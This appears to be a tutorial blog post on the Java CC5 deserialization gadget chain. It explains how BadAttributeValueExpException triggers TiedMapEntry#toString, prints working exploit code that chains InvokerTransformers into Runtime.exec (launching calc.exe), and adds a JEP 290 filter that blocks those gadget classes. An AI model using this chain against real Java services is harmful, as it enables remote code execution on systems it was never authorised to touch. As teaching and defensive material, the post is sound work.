Java Deserialization: the CC5 Chain

Preface

This is a bit of groundwork for studying fastjson later on.
The difference between CC5 and CC6, in short:
When we built CC6, we started from HashMap's readObject and assembled a chain that triggers TiedMapEntry's hashcode->setValue->LazyMap#get.
In CC5 the entry class is swapped out, and the chain instead triggers TiedMapEntry's toString method; the second half is exactly the same.
So what we learn in CC5 is how to get a toString call triggered.

CC5

Compared with CC6, all that changes is that the whole HashMap sequence is replaced with

    BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
    setFieldValue(badAttributeValueExpException, "val", tme);

and that gives us CC5.
Of course we still need to look at how the chain is constructed in detail.

    // javax.management.BadAttributeValueExpException#readObject (JDK source)
    private void readObject(ObjectInputStream ois) throws IOException, ClassNotFoundException {
        ObjectInputStream.GetField gf = ois.readFields();
        Object valObj = gf.get("val", null);

        if (valObj == null) {
            val = null;
        } else if (valObj instanceof String) {
            val = valObj;
        } else if (System.getSecurityManager() == null
                || valObj instanceof Long
                || valObj instanceof Integer
                || valObj instanceof Float
                || valObj instanceof Double
                || valObj instanceof Byte
                || valObj instanceof Short
                || valObj instanceof Boolean) {
            val = valObj.toString();   // <- toString() on whatever object was stored in "val"
        } else { // the serialized object is from a version without JDK-8019292 fix
            val = System.identityHashCode(valObj) + "@" + valObj.getClass().getName();
        }
    }

By assigning a TiedMapEntry object to the val field via reflection, deserialization reaches the branch where no SecurityManager is installed (valObj is neither null nor a String), and val = valObj.toString() is executed, which triggers the toString method.

exp

    import java.lang.reflect.Field;
    import java.util.HashMap;
    import java.util.Map;
    import javax.management.BadAttributeValueExpException;
    import org.apache.commons.collections.Transformer;
    import org.apache.commons.collections.functors.ChainedTransformer;
    import org.apache.commons.collections.functors.ConstantTransformer;
    import org.apache.commons.collections.functors.InvokerTransformer;
    import org.apache.commons.collections.keyvalue.TiedMapEntry;
    import org.apache.commons.collections.map.LazyMap;

    // A harmless placeholder chain is used while the objects are assembled, so that
    // nothing executes locally; the real transformers are swapped in at the very end.
    Transformer[] fakeTransformers = new Transformer[] { new ConstantTransformer(1) };
    Transformer[] transformers = new Transformer[] {
        new ConstantTransformer(Runtime.class),
        new InvokerTransformer("getMethod", new Class[] { String.class, Class[].class },
                new Object[] { "getRuntime", new Class[0] }),
        new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class },
                new Object[] { null, new Object[0] }),
        new InvokerTransformer("exec", new Class[] { String.class },
                new String[] { "calc.exe" }),
    };
    Transformer transformerChain = new ChainedTransformer(fakeTransformers);
    Map innerMap = new HashMap();
    // LazyMap#get runs the transformer chain on a key that is not present
    Map outerMap = LazyMap.lazyMap(innerMap, transformerChain);
    // TiedMapEntry#toString -> getValue -> LazyMap#get
    TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey");
    // BadAttributeValueExpException#readObject calls val.toString()
    BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
    setFieldValue(badAttributeValueExpException, "val", tme);
    setFieldValue(transformerChain, "iTransformers", transformers);

    // Reflection helper used above (the post assumes it; shown here so the snippet is complete)
    static void setFieldValue(Object obj, String name, Object value) throws Exception {
        Field f = obj.getClass().getDeclaredField(name);
        f.setAccessible(true);
        f.set(obj, value);
    }

The rest of the chain from TiedMapEntry onwards has already been covered, so it is not repeated here.
The key thing to learn is how the toString method gets triggered.
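From the defensive side, the entry point of this chain is fixed: a serialized BadAttributeValueExpException whose val field holds a non-String object. An added example (not from the original post) showing how a JEP 290 deserialization filter rejects the gadget classes used by CC5 before their readObject ever runs; the pattern string and class name Cc5FilterDemo are my own choices, and the filter only needs the JDK, so it runs without commons-collections on the classpath:

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import javax.management.BadAttributeValueExpException;

public class Cc5FilterDemo {
    // JEP 290 pattern (assumed deployment policy, not from the post): patterns are
    // checked in order, "!" rejects, "**" covers a package and its subpackages,
    // "maxdepth" caps object-graph nesting, and the trailing "*" allows the rest.
    static final String PATTERN =
            "!javax.management.BadAttributeValueExpException;"
          + "!org.apache.commons.collections.keyvalue.TiedMapEntry;"
          + "!org.apache.commons.collections.map.LazyMap;"
          + "!org.apache.commons.collections.functors.**;"
          + "maxdepth=20;*";

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    // The filter is consulted for every class resolved from the stream, so a
    // rejected class raises InvalidClassException before its readObject runs.
    static Object deserializeFiltered(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            ois.setObjectInputFilter(ObjectInputFilter.Config.createFilter(PATTERN));
            return ois.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        // Ordinary data still passes through the filter
        System.out.println("benign: " + deserializeFiltered(serialize("hello")));

        // The CC5 entry class is rejected even with val == null, i.e. before any
        // TiedMapEntry / LazyMap / Transformer objects need to be on the classpath
        byte[] entry = serialize(new BadAttributeValueExpException(null));
        try {
            deserializeFiltered(entry);
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The same pattern can be applied process-wide with the jdk.serialFilter system property instead of per stream, which is the usual way to cover code paths you do not control.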

Closing remarks

This also lays groundwork for studying fastjson later, where we will see further chains that trigger the toString method.